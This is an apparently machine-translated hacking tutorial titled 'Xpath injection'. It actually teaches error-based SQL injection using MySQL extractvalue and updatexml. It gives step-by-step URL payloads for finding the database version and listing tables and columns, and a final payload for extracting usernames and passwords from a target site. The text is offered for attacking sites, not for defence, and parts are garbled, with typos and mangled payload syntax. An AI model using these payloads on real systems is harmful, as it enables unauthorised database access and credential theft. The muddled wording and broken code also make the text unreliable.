*** Hidden text: cannot be quoted. ***
Xpath injection
Application :
1. For example, when the command + order + by + 99999-- the number 1 that you type does not load the page, you must use this method.
2. When you have to use the number of column the diffrent error.
3. When union…. And even though the number is correct, it does not show you the vulnerable column.
4. .....
-------------- -------------- --------------
How to use the xpath method
First, use the bypasses that you know, such as: negative behind the number, source, capitalization, etc.
If the problem is not solved, go to this method.
Xpath method tutorial:
Get the version:
Code:
… ..? Sa = 12 + and + extractvalue (rand (), concat (0x7e, version ())) -
0x7e means the symbol (~).
version () means site version.
In the next tutorial, I will teach you how to pull out the tables.
-------------
Well, as I said in this tutorial, I'm going to teach you how to pull out tables in the Xpath method.
Obtaining tables:
Code:
… ..? Sa = 12 + and + extractvalue (rand (), concat (0x7e, (select + table_name + from + information_schema.tables + limit + 0,1))) -
select: to display,
table_name: table name,
: from + information_schema.tables In the tables of this section,
limit 0,1 to count tables.
To count one by one, increase the limit number (note the first value is 0).
And that 0 that we put itself means 1.
To restrict tables that do not show the default tables:
Code:
… ..? Sa = 12 + and + extractvalue (rand (), concat (0x7e, (select + table_name + from + information_schema.tables + where + table_schema = database () + limit + 0,1))) -
And like above, you add the limit one by one.
. In the next tutorial, I will teach you how to pull out columns
>>
Pull out columns:
Code:
… ..? Sa = 12 + and + extractvalue (rand (), concat (0x7e, (select + column_name + from + information_schema.columns + where + table_name = {hex = table name mohem limit + limit + 0,1)) ) -
Instead of a hex equal to a semi-important table, write the name of the table as a hex. (With 0x)
And to pull out all the columns, you have to increase the limit number one by one.
-----------------
Code:
Example :
First column =
… ..? Sa = 12 + and + extractvalue (rand (), concat (0x7e, (select + column_name + from + information_schema.columns + where + table_name = {hex = table name mohem limit + limit + 0,1)) ) -
Second column =
… ..? Sa = 12 + and + extractvalue (rand (), concat (0x7e, (select + column_name + from + information_schema.columns + where + table_name = {hex = table name mohem limit + limit + 1,1)) ) -
Third column =
… ..? Sa = 12 + and + extractvalue (rand (), concat (0x7e, (select + column_name + from + information_schema.columns + where + table_name = {hex = table name mohem limit + limit + 2,1)) ) -
And....
Extract username and password:
Code:
… ..? Sa = 12 + and + extractvalue (rand (), concat (0x7e, (select + concat (username, 0x3a, passworsd) + from + {table name mohem} + limit + 0,1))) -
In the semi-important table section, write the name of your important table without hacking.
-------------------------------------------------- -------------------------------------------------- ------------
Note: If at one time the site was sensitive to extractvalue or you received any error, you can use its alternative, ie:
updatexml
To understand that it works on the updatexml site, you must first click this command:
Code:
Site.com/news.php?ID=23+and+updatexml()--
And if you get an error like:
Incorrect parameter count in the call to native function “updatexml ()”
This means that the site is not sensitive to updatexml.
And the first command to get the version:
Code:
… ..? ID = 23 + and + updatexml (null, concat (0x3a, version ()), null) -
And extract tabs and restrict database:
Code:
… ..? ID = 23 + and + updatexml (null, concat (0x3a, (select + table_name + from + information_schema.tables + where + table_schema = database () + limit + 0,1)), null) -
Add the first limit to show the next tables. (Note that zero itself is the first table)
Pull out columns:
Code:
… ..? ID = 23 + and + updatexml (null, concat (0x3a, (select + column_name + from + information_schema.columns + where + table_name = {hex = table name mohem limit + limit + 0,1)), null ) -
And to show the important column, add the limit one by one and put hex = table name mohem} hexed in your important table.
Extract password and username:
Code:
… ..? ID = 23 + and + updatexml (null, concat (0x3a, (select + concat (username, 0x3a, passwor) + from + {table name} limit + 0,1)), null)